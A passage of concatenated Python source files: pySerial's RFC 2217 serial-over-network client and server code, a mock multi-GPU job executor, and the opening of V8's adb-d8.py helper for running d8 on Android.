# and now wait until parameters are active
items = self._rfc2217_port_settings.values()
if self.logger:
self.logger.debug("Negotiating settings: {}".format(items))
timeout = Timeout(self._network_timeout)
while not timeout.expired():
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in items) == len(items):
break
else:
raise SerialException("Remote does not accept parameter change (RFC2217): {!r}".format(items))
if self.logger:
self.logger.info("Negotiated settings: {}".format(items))
if self._rtscts and self._xonxoff:
raise ValueError('xonxoff and rtscts together are not supported')
elif self._rtscts:
self.rfc2217_set_control(SET_CONTROL_USE_HW_FLOW_CONTROL)
elif self._xonxoff:
self.rfc2217_set_control(SET_CONTROL_USE_SW_FLOW_CONTROL)
else:
self.rfc2217_set_control(SET_CONTROL_USE_NO_FLOW_CONTROL)
def close(self):
"""Close port"""
self.is_open = False
if self._socket:
try:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
except:
# ignore errors.
pass
if self._thread:
self._thread.join(7) # XXX more than socket timeout
self._thread = None
# in case of quick reconnects, give the server some time
time.sleep(0.3)
self._socket = None
def from_url(self, url):
"""\
extract host and port from a URL string; other settings are extracted
and stored in the instance
"""
parts = urlparse.urlsplit(url)
if parts.scheme != "rfc2217":
raise SerialException(
'expected a string in the form '
'"rfc2217://<host>:<port>[?option[&option...]]": '
'not starting with rfc2217:// ({!r})'.format(parts.scheme))
try:
# process options now, directly altering self
for option, values in urlparse.parse_qs(parts.query, True).items():
if option == 'logging':
logging.basicConfig() # XXX is that good to call it here?
self.logger = logging.getLogger('pySerial.rfc2217')
self.logger.setLevel(LOGGER_LEVELS[values[0]])
self.logger.debug('enabled logging')
elif option == 'ign_set_control':
self._ignore_set_control_answer = True
elif option == 'poll_modem':
self._poll_modem_state = True
elif option == 'timeout':
self._network_timeout = float(values[0])
else:
raise ValueError('unknown option: {!r}'.format(option))
if not 0 <= parts.port < 65536:
raise ValueError("port not in range 0...65535")
except ValueError as e:
raise SerialException(
'expected a string in the form '
'"rfc2217://<host>:<port>[?option[&option...]]": {}'.format(e))
return (parts.hostname, parts.port)
# - - - - - - - - - - - - - - - - - - - - - - - -
@property
def in_waiting(self):
"""Return the number of bytes currently in the input buffer."""
if not self.is_open:
raise portNotOpenError
return self._read_buffer.qsize()
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read.
"""
if not self.is_open:
raise portNotOpenError
data = bytearray()
try:
timeout = Timeout(self._timeout)
while len(data) < size:
if self._thread is None:
raise SerialException('connection failed (reader thread died)')
data += self._read_buffer.get(True, timeout.time_left())
if timeout.expired():
break
except Queue.Empty: # -> timeout
pass
return bytes(data)
def write(self, data):
"""\
Output the given byte string over the serial port. Can block if the
connection is blocked. May raise SerialException if the connection is
closed.
"""
if not self.is_open:
raise portNotOpenError
with self._write_lock:
try:
self._socket.sendall(to_bytes(data).replace(IAC, IAC_DOUBLED))
except socket.error as e:
raise SerialException("connection failed (socket error): {}".format(e))
return len(data)
def reset_input_buffer(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self.is_open:
raise portNotOpenError
self.rfc2217_send_purge(PURGE_RECEIVE_BUFFER)
# empty read buffer
while self._read_buffer.qsize():
self._read_buffer.get(False)
def reset_output_buffer(self):
"""\
Clear output buffer, aborting the current output and
discarding all that is in the buffer.
"""
if not self.is_open:
raise portNotOpenError
self.rfc2217_send_purge(PURGE_TRANSMIT_BUFFER)
def _update_break_state(self):
"""\
Set break: Controls TXD. When active, no transmitting is
possible.
"""
if not self.is_open:
raise portNotOpenError
if self.logger:
self.logger.info('set BREAK to {}'.format('active' if self._break_state else 'inactive'))
if self._break_state:
self.rfc2217_set_control(SET_CONTROL_BREAK_ON)
else:
self.rfc2217_set_control(SET_CONTROL_BREAK_OFF)
def _update_rts_state(self):
"""Set terminal status line: Request To Send."""
if not self.is_open:
raise portNotOpenError
if self.logger:
self.logger.info('set RTS to {}'.format('active' if self._rts_state else 'inactive'))
if self._rts_state:
self.rfc2217_set_control(SET_CONTROL_RTS_ON)
else:
self.rfc2217_set_control(SET_CONTROL_RTS_OFF)
def _update_dtr_state(self):
"""Set terminal status line: Data Terminal Ready."""
if not self.is_open:
raise portNotOpenError
if self.logger:
self.logger.info('set DTR to {}'.format('active' if self._dtr_state else 'inactive'))
if self._dtr_state:
self.rfc2217_set_control(SET_CONTROL_DTR_ON)
else:
self.rfc2217_set_control(SET_CONTROL_DTR_OFF)
@property
def cts(self):
"""Read terminal status line: Clear To Send."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_CTS)
@property
def dsr(self):
"""Read terminal status line: Data Set Ready."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_DSR)
@property
def ri(self):
"""Read terminal status line: Ring Indicator."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_RI)
@property
def cd(self):
"""Read terminal status line: Carrier Detect."""
if not self.is_open:
raise portNotOpenError
return bool(self.get_modem_state() & MODEMSTATE_MASK_CD)
# - - - platform specific - - -
# None so far
# - - - RFC2217 specific - - -
def _telnet_read_loop(self):
"""Read loop for the socket."""
mode = M_NORMAL
suboption = None
try:
while self.is_open:
try:
data = self._socket.recv(1024)
except socket.timeout:
# just need to get out of recv from time to time to check if
# still alive
continue
except socket.error as e:
# connection fails -> terminate loop
if self.logger:
self.logger.debug("socket error in reader thread: {}".format(e))
break
if not data:
break # lost connection
for byte in iterbytes(data):
if mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
mode = M_IAC_SEEN
else:
# store data in read buffer or sub option buffer
# depending on state
if suboption is not None:
suboption += byte
else:
self._read_buffer.put(byte)
elif mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if suboption is not None:
suboption += IAC
else:
self._read_buffer.put(IAC)
mode = M_NORMAL
elif byte == SB:
# sub option start
suboption = bytearray()
mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnet_process_subnegotiation(bytes(suboption))
suboption = None
mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
telnet_command = byte
mode = M_NEGOTIATE
else:
# other telnet commands
self._telnet_process_command(byte)
mode = M_NORMAL
elif mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnet_negotiate_option(telnet_command, byte)
mode = M_NORMAL
finally:
self._thread = None
if self.logger:
self.logger.debug("read thread terminated")
# - incoming telnet commands and options
def _telnet_process_command(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: {!r}".format(command))
def _telnet_negotiate_option(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnet_send_option((DONT if command == WILL else WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: {!r}".format(option))
def _telnet_process_subnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if suboption[1:2] == SERVER_NOTIFY_LINESTATE and len(suboption) >= 3:
self._linestate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_LINESTATE: {}".format(self._linestate))
elif suboption[1:2] == SERVER_NOTIFY_MODEMSTATE and len(suboption) >= 3:
self._modemstate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: {}".format(self._modemstate))
# update time when we think that a poll would make sense
self._modemstate_timeout.restart(0.3)
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
self._remote_suspend_flow = False
else:
for item in self._rfc2217_options.values():
if item.ack_option == suboption[1:2]:
#~ print "processing COM_PORT_OPTION: %r" % list(suboption[1:])
item.check_answer(bytes(suboption[2:]))
break
else:
if self.logger:
self.logger.warning("ignoring COM_PORT_OPTION: {!r}".format(suboption))
else:
if self.logger:
self.logger.warning("ignoring subnegotiation: {!r}".format(suboption))
# - outgoing telnet commands and options
def _internal_raw_write(self, data):
"""internal socket write with no data escaping. used to send telnet stuff."""
with self._write_lock:
self._socket.sendall(data)
def telnet_send_option(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self._internal_raw_write(IAC + action + option)
def rfc2217_send_subnegotiation(self, option, value=b''):
"""Subnegotiation of RFC2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self._internal_raw_write(IAC + SB + COM_PORT_OPTION + option + value + IAC + SE)
def rfc2217_send_purge(self, value):
"""\
Send purge request to the remote.
(PURGE_RECEIVE_BUFFER / PURGE_TRANSMIT_BUFFER / PURGE_BOTH_BUFFERS)
"""
item = self._rfc2217_options['purge']
item.set(value) # transmit desired purge type
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217_set_control(self, value):
"""transmit change of control line to remote"""
item = self._rfc2217_options['control']
item.set(value) # transmit desired control type
if self._ignore_set_control_answer:
# answers are ignored when option is set. compatibility mode for
# servers that answer, but not the expected one... (or no answer
# at all) i.e. sredird
time.sleep(0.1) # this helps getting the unit tests passed
else:
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217_flow_server_ready(self):
"""\
check if server is ready to receive data. block for some time when
not.
"""
#~ if self._remote_suspend_flow:
#~ wait---
def get_modem_state(self):
"""\
get last modem state (cached value). If the value is "old", request a new
one. This cache helps to avoid issuing too many requests when e.g. all
status lines are queried by the user one after the other (getCTS, getDSR
etc.)
"""
# active modem state polling enabled? is the value fresh enough?
if self._poll_modem_state and self._modemstate_timeout.expired():
if self.logger:
self.logger.debug('polling modem state')
# when it is older, request an update
self.rfc2217_send_subnegotiation(NOTIFY_MODEMSTATE)
timeout = Timeout(self._network_timeout)
while not timeout.expired():
time.sleep(0.05) # prevent 100% CPU load
# when expiration time is updated, it means that there is a new
# value
if not self._modemstate_timeout.expired():
break
else:
if self.logger:
self.logger.warning('poll for modem state failed')
# even when there is a timeout, do not generate an error just
# return the last known value. this way we can support buggy
# servers that do not respond to polls, but send automatic
# updates.
if self._modemstate is not None:
if self.logger:
self.logger.debug('using cached modem state')
return self._modemstate
else:
# never received a notification from the server
raise SerialException("remote sends no NOTIFY_MODEMSTATE")
#############################################################################
# The following is code that helps implementing an RFC 2217 server.
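# A minimal server-side wiring sketch (illustrative only, not part of the
# original module). It assumes `ser` is an open serial.Serial instance and
# `sock` a connected TCP socket whose peer is an RFC 2217 client; the small
# SocketWriter wrapper merely provides the write() method PortManager expects.
#
#   class SocketWriter(object):
#       def __init__(self, sock):
#           self.sock = sock
#       def write(self, data):
#           self.sock.sendall(data)
#
#   mgr = PortManager(ser, SocketWriter(sock))
#   while True:
#       data = sock.recv(1024)
#       if not data:
#           break
#       # strip telnet/RFC 2217 control sequences before they reach the port
#       ser.write(b''.join(mgr.filter(data)))
#       # escape outgoing serial data so IAC bytes survive the telnet stream
#       sock.sendall(b''.join(mgr.escape(ser.read(ser.in_waiting or 1))))
#       # notify the client about modem line changes (polling, see below)
#       mgr.check_modem_lines()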
class PortManager(object):
"""\
This class manages the state of Telnet and RFC 2217. It needs a serial
instance and a connection to work with. Connection is expected to implement
a (thread safe) write function that writes the string to the network.
"""
def __init__(self, serial_port, connection, logger=None):
self.serial = serial_port
self.connection = connection
self.logger = logger
self._client_is_rfc2217 = False
# filter state machine
self.mode = M_NORMAL
self.suboption = None
self.telnet_command = None
# states for modem/line control events
self.modemstate_mask = 255
self.last_modemstate = None
self.linstate_mask = 0
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED, self._client_ok),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, INACTIVE, self._client_ok),
]
# negotiate Telnet/RFC2217 -> send initial requests
if self.logger:
self.logger.debug("requesting initial Telnet/RFC 2217 options")
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnet_send_option(option.send_yes, option.option)
# issue 1st modem state notification
def _client_ok(self):
"""\
callback of telnet option. It gets called when option is activated.
This one here is used to detect when the client agrees on RFC 2217. A
flag is set so that other functions like check_modem_lines know if the
client is OK.
"""
# The callback is used for we and they so if one party agrees, we're
# already happy. it seems not all servers do the negotiation correctly
# and i guess there are incorrect clients too.. so be happy if client
# answers one or the other positively.
self._client_is_rfc2217 = True
if self.logger:
self.logger.info("client accepts RFC 2217")
# this is to ensure that the client gets a notification, even if there
# was no change
self.check_modem_lines(force_notification=True)
# - outgoing telnet commands and options
def telnet_send_option(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self.connection.write(IAC + action + option)
def rfc2217_send_subnegotiation(self, option, value=b''):
"""Subnegotiation of RFC 2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self.connection.write(IAC + SB + COM_PORT_OPTION + option + value + IAC + SE)
# - check modem lines, needs to be called periodically from user to
# establish polling
def check_modem_lines(self, force_notification=False):
"""\
        Read the control lines from the serial port and compare them with the
        last value sent to the remote end; send updates on changes.
"""
modemstate = (
(self.serial.getCTS() and MODEMSTATE_MASK_CTS) |
(self.serial.getDSR() and MODEMSTATE_MASK_DSR) |
(self.serial.getRI() and MODEMSTATE_MASK_RI) |
(self.serial.getCD() and MODEMSTATE_MASK_CD))
# check what has changed
deltas = modemstate ^ (self.last_modemstate or 0) # when last is None -> 0
if deltas & MODEMSTATE_MASK_CTS:
modemstate |= MODEMSTATE_MASK_CTS_CHANGE
if deltas & MODEMSTATE_MASK_DSR:
modemstate |= MODEMSTATE_MASK_DSR_CHANGE
if deltas & MODEMSTATE_MASK_RI:
modemstate |= MODEMSTATE_MASK_RI_CHANGE
if deltas & MODEMSTATE_MASK_CD:
modemstate |= MODEMSTATE_MASK_CD_CHANGE
# if new state is different and the mask allows this change, send
# notification. suppress notifications when client is not rfc2217
if modemstate != self.last_modemstate or force_notification:
if (self._client_is_rfc2217 and (modemstate & self.modemstate_mask)) or force_notification:
self.rfc2217_send_subnegotiation(
SERVER_NOTIFY_MODEMSTATE,
to_bytes([modemstate & self.modemstate_mask]))
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: {}".format(modemstate))
# save last state, but forget about deltas.
# otherwise it would also notify about changing deltas which is
# probably not very useful
self.last_modemstate = modemstate & 0xf0
# - outgoing data escaping
def escape(self, data):
"""\
This generator function is for the user. All outgoing data has to be
properly escaped, so that no IAC character in the data stream messes up
the Telnet state machine in the server.
        socket.sendall(b''.join(escape(data)))

        (See also the usage sketch after this class.)
"""
for byte in iterbytes(data):
if byte == IAC:
yield IAC
yield IAC
else:
yield byte
# - incoming data filter
def filter(self, data):
"""\
Handle a bunch of incoming bytes. This is a generator. It will yield
all characters not of interest for Telnet/RFC 2217.
The idea is that the reader thread pushes data from the socket through
this filter:
for byte in filter(socket.recv(1024)):
# do things like CR/LF conversion/whatever
# and write data to the serial port
serial.write(byte)
(socket error handling code left as exercise for the reader)
"""
for byte in iterbytes(data):
if self.mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
self.mode = M_IAC_SEEN
else:
# store data in sub option buffer or pass it to our
# consumer depending on state
if self.suboption is not None:
self.suboption += byte
else:
yield byte
elif self.mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if self.suboption is not None:
self.suboption += byte
else:
yield byte
self.mode = M_NORMAL
elif byte == SB:
# sub option start
self.suboption = bytearray()
self.mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnet_process_subnegotiation(bytes(self.suboption))
self.suboption = None
self.mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
self.telnet_command = byte
self.mode = M_NEGOTIATE
else:
# other telnet commands
self._telnet_process_command(byte)
self.mode = M_NORMAL
elif self.mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnet_negotiate_option(self.telnet_command, byte)
self.mode = M_NORMAL
# - incoming telnet commands and options
def _telnet_process_command(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: {!r}".format(command))
def _telnet_negotiate_option(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnet_send_option((DONT if command == WILL else WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: {!r}".format(option))
def _telnet_process_subnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if self.logger:
self.logger.debug('received COM_PORT_OPTION: {!r}'.format(suboption))
if suboption[1:2] == SET_BAUDRATE:
backup = self.serial.baudrate
try:
(baudrate,) = struct.unpack(b"!I", suboption[2:6])
if baudrate != 0:
self.serial.baudrate = baudrate
except ValueError as e:
if self.logger:
self.logger.error("failed to set baud rate: {}".format(e))
self.serial.baudrate = backup
else:
if self.logger:
self.logger.info("{} baud rate: {}".format('set' if baudrate else 'get', self.serial.baudrate))
self.rfc2217_send_subnegotiation(SERVER_SET_BAUDRATE, struct.pack(b"!I", self.serial.baudrate))
elif suboption[1:2] == SET_DATASIZE:
backup = self.serial.bytesize
try:
(datasize,) = struct.unpack(b"!B", suboption[2:3])
if datasize != 0:
self.serial.bytesize = datasize
except ValueError as e:
if self.logger:
self.logger.error("failed to set data size: {}".format(e))
self.serial.bytesize = backup
else:
if self.logger:
self.logger.info("{} data size: {}".format('set' if datasize else 'get', self.serial.bytesize))
self.rfc2217_send_subnegotiation(SERVER_SET_DATASIZE, struct.pack(b"!B", self.serial.bytesize))
elif suboption[1:2] == SET_PARITY:
backup = self.serial.parity
try:
parity = struct.unpack(b"!B", suboption[2:3])[0]
if parity != 0:
self.serial.parity = RFC2217_REVERSE_PARITY_MAP[parity]
except ValueError as e:
if self.logger:
self.logger.error("failed to set parity: {}".format(e))
self.serial.parity = backup
else:
if self.logger:
self.logger.info("{} parity: {}".format('set' if parity else 'get', self.serial.parity))
self.rfc2217_send_subnegotiation(
SERVER_SET_PARITY,
struct.pack(b"!B", RFC2217_PARITY_MAP[self.serial.parity]))
elif suboption[1:2] == SET_STOPSIZE:
backup = self.serial.stopbits
try:
stopbits = struct.unpack(b"!B", suboption[2:3])[0]
if stopbits != 0:
self.serial.stopbits = RFC2217_REVERSE_STOPBIT_MAP[stopbits]
except ValueError as e:
if self.logger:
self.logger.error("failed to set stop bits: {}".format(e))
self.serial.stopbits = backup
else:
if self.logger:
self.logger.info("{} stop bits: {}".format('set' if stopbits else 'get', self.serial.stopbits))
self.rfc2217_send_subnegotiation(
SERVER_SET_STOPSIZE,
struct.pack(b"!B", RFC2217_STOPBIT_MAP[self.serial.stopbits]))
elif suboption[1:2] == SET_CONTROL:
if suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING:
if self.serial.xonxoff:
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif self.serial.rtscts:
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
else:
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL:
self.serial.xonxoff = False
self.serial.rtscts = False
if self.logger:
self.logger.info("changed flow control to None")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_NO_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTROL:
self.serial.xonxoff = True
if self.logger:
self.logger.info("changed flow control to XON/XOFF")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_SW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTROL:
self.serial.rtscts = True
if self.logger:
self.logger.info("changed flow control to RTS/CTS")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_USE_HW_FLOW_CONTROL)
elif suboption[2:3] == SET_CONTROL_REQ_BREAK_STATE:
if self.logger:
self.logger.warning("requested break state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_BREAK_ON:
self.serial.setBreak(True)
if self.logger:
self.logger.info("changed BREAK to active")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_ON)
elif suboption[2:3] == SET_CONTROL_BREAK_OFF:
self.serial.setBreak(False)
if self.logger:
self.logger.info("changed BREAK to inactive")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_BREAK_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_DTR:
if self.logger:
self.logger.warning("requested DTR state - not implemented")
pass # XXX needs cached value
elif suboption[2:3] == SET_CONTROL_DTR_ON:
self.serial.setDTR(True)
if self.logger:
self.logger.info("changed DTR to active")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_ON)
elif suboption[2:3] == SET_CONTROL_DTR_OFF:
self.serial.setDTR(False)
if self.logger:
self.logger.info("changed DTR to inactive")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_DTR_OFF)
elif suboption[2:3] == SET_CONTROL_REQ_RTS:
if self.logger:
self.logger.warning("requested RTS state - not implemented")
pass # XXX needs cached value
#~ self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_ON:
self.serial.setRTS(True)
if self.logger:
self.logger.info("changed RTS to active")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_ON)
elif suboption[2:3] == SET_CONTROL_RTS_OFF:
self.serial.setRTS(False)
if self.logger:
self.logger.info("changed RTS to inactive")
self.rfc2217_send_subnegotiation(SERVER_SET_CONTROL, SET_CONTROL_RTS_OFF)
#~ elif suboption[2:3] == SET_CONTROL_REQ_FLOW_SETTING_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_NO_FLOW_CONTROL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_SW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_HW_FLOW_CONTOL_IN:
#~ elif suboption[2:3] == SET_CONTROL_USE_DCD_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DTR_FLOW_CONTROL:
#~ elif suboption[2:3] == SET_CONTROL_USE_DSR_FLOW_CONTROL:
elif suboption[1:2] == NOTIFY_LINESTATE:
# client polls for current state
self.rfc2217_send_subnegotiation(
SERVER_NOTIFY_LINESTATE,
to_bytes([0])) # sorry, nothing like that implemented
elif suboption[1:2] == NOTIFY_MODEMSTATE:
if self.logger:
self.logger.info("request for modem state")
# client polls for current state
self.check_modem_lines(force_notification=True)
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
if self.logger:
self.logger.info("suspend")
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
if self.logger:
self.logger.info("resume")
self._remote_suspend_flow = False
elif suboption[1:2] == SET_LINESTATE_MASK:
self.linstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("line state mask: 0x{:02x}".format(self.linstate_mask))
elif suboption[1:2] == SET_MODEMSTATE_MASK:
self.modemstate_mask = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("modem state mask: 0x{:02x}".format(self.modemstate_mask))
elif suboption[1:2] == PURGE_DATA:
if suboption[2:3] == PURGE_RECEIVE_BUFFER:
self.serial.reset_input_buffer()
if self.logger:
self.logger.info("purge in")
self.rfc2217_send_subnegotiation(SERVER_PURGE_DATA, PURGE_RECEIVE_BUFFER)
elif suboption[2:3] == PURGE_TRANSMIT_BUFFER:
self.serial.reset_output_buffer()
if self.logger:
self.logger.info("purge out")
self.rfc2217_send_subnegotiation(SERVER_PURGE_DATA, PURGE_TRANSMIT_BUFFER)
elif suboption[2:3] == PURGE_BOTH_BUFFERS:
self.serial.reset_input_buffer()
self.serial.reset_output_buffer()
if self.logger:
self.logger.info("purge both")
self.rfc2217_send_subnegotiation(SERVER_PURGE_DATA, PURGE_BOTH_BUFFERS)
else:
if self.logger:
self.logger.error("undefined PURGE_DATA: {!r}".format(list(suboption[2:])))
else:
if self.logger:
self.logger.error("undefined COM_PORT_OPTION: {!r}".format(list(suboption[1:])))
else:
if self.logger:
self.logger.warning("unknown subnegotiation: {!r}".format(suboption))
# simple client test
if __name__ == '__main__':
import sys
s = Serial('rfc2217://localhost:7000', 115200)
sys.stdout.write('{}\n'.format(s))
sys.stdout.write("write...\n")
s.write(b"hello\n")
s.flush()
sys.stdout.write("read: {}\n".format(s.read(5)))
s.close()
|
discovery.py
|
import time
from threading import Thread, Event
from queue import Queue
from threading import Lock
def setup_mock_executor(gpu_list, jobs_per_gpu):
return MockExecutor(gpu_list, jobs_per_gpu)
def check_jobs_done_mock(jobs, executor):
while True:
num_finished = sum(executor.check_job_done(job) for job in jobs)
if num_finished == len(jobs):
break
time.sleep(5)
class MockExecutor:
def __init__(self, gpu_list, jobs_per_gpu):
self.gpu_list = gpu_list
self.jobs_per_gpu = jobs_per_gpu
# fc_queue is for jobs to run
self.fc_queue = Queue()
# gpu_queue is for available gpus
self.gpu_queue = Queue()
# done dict indicates which jobs are done
self.done_dict = dict()
self.done_dict_lock = Lock()
# running list keeps track of running jobs
self.running_list = list()
self.running_list_lock = Lock()
# each job gets an index
self.running_job_idx = 0
# enqueue available gpus and start worker threads
self.enqueue_gpus_()
self.worker_run_thread, self.worker_release_thread = None, None
self.worker_release_thread_flag = Event()
self.run_threads_()
def submit(self, run_fc, *args, **kwargs):
job_idx = self.running_job_idx
self.running_job_idx += 1
self.done_dict_lock.acquire()
self.done_dict[job_idx] = False
self.done_dict_lock.release()
self.fc_queue.put((run_fc, job_idx, args, kwargs))
return job_idx
def check_job_done(self, job_idx):
self.done_dict_lock.acquire()
done = self.done_dict[job_idx]
self.done_dict_lock.release()
return done
def stop(self):
self.fc_queue.put(None)
self.worker_release_thread_flag.set()
self.worker_run_thread.join()
self.worker_release_thread.join()
def enqueue_gpus_(self):
for gpu in self.gpu_list:
for _ in range(self.jobs_per_gpu):
self.gpu_queue.put(gpu)
def run_threads_(self):
self.worker_run_thread = Thread(target=self.worker_run_)
self.worker_run_thread.start()
self.worker_release_thread = Thread(target=self.worker_release_)
self.worker_release_thread.start()
def worker_run_(self):
while True:
item = self.fc_queue.get()
if item is None:
break
else:
run_fc, job_idx, args, kwargs = item
gpu_idx = self.gpu_queue.get()
kwargs["gpu"] = gpu_idx
process = run_fc(*args, **kwargs)
self.running_list_lock.acquire()
self.running_list.append((job_idx, gpu_idx, process))
self.running_list_lock.release()
def worker_release_(self):
while True:
self.running_list_lock.acquire()
if self.worker_release_thread_flag.is_set() and len(self.running_list) == 0:
self.running_list_lock.release()
break
to_delete = []
for idx, item in enumerate(self.running_list):
job_idx, gpu_idx, process = item
if process.poll() is not None:
self.done_dict_lock.acquire()
self.done_dict[job_idx] = True
self.done_dict_lock.release()
self.gpu_queue.put(gpu_idx)
to_delete.append(idx)
for idx in reversed(to_delete):
del self.running_list[idx]
self.running_list_lock.release()
            # there's no queue to block on, so sleep between polls instead
time.sleep(5)
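# --- illustrative usage sketch (not part of the original file) ---------------
# MockExecutor expects run_fc to return an object exposing poll() (e.g. a
# subprocess.Popen); poll() returning non-None is what marks a job as done in
# worker_release_. The sleep command below is an assumption (POSIX only),
# chosen purely to demonstrate the submit/check/stop flow.
if __name__ == "__main__":
    import subprocess

    def run_sleep(seconds, gpu=None):
        # the executor injects the assigned gpu index via the "gpu" kwarg
        return subprocess.Popen(["sleep", str(seconds)])

    executor = setup_mock_executor(gpu_list=[0, 1], jobs_per_gpu=2)
    jobs = [executor.submit(run_sleep, 1) for _ in range(4)]
    check_jobs_done_mock(jobs, executor)  # blocks until every job has finished
    executor.stop()                       # shut down both worker threads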
|
adb-d8.py
|
#!/usr/bin/env python
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Runs an android build of d8 over adb, with any given arguments. Files
# requested by d8 are transferred on-demand from the caller, by reverse port
# forwarding a simple TCP file server from the computer to the android device.
#
# Usage:
# adb-d8.py <build_dir> [<d8_args>...]
#
# Options:
# <build_dir> The directory containing the android build of d8.
# <d8_args>... The arguments passed through to d8.
#
# Run adb-d8.py --help for complete usage information.
from __future__ import print_function
import os
import sys
import struct
import threading
import subprocess
import SocketServer # TODO(leszeks): python 3 compatibility
def CreateFileHandlerClass(root_dirs, verbose):
class FileHandler(SocketServer.BaseRequestHandler):
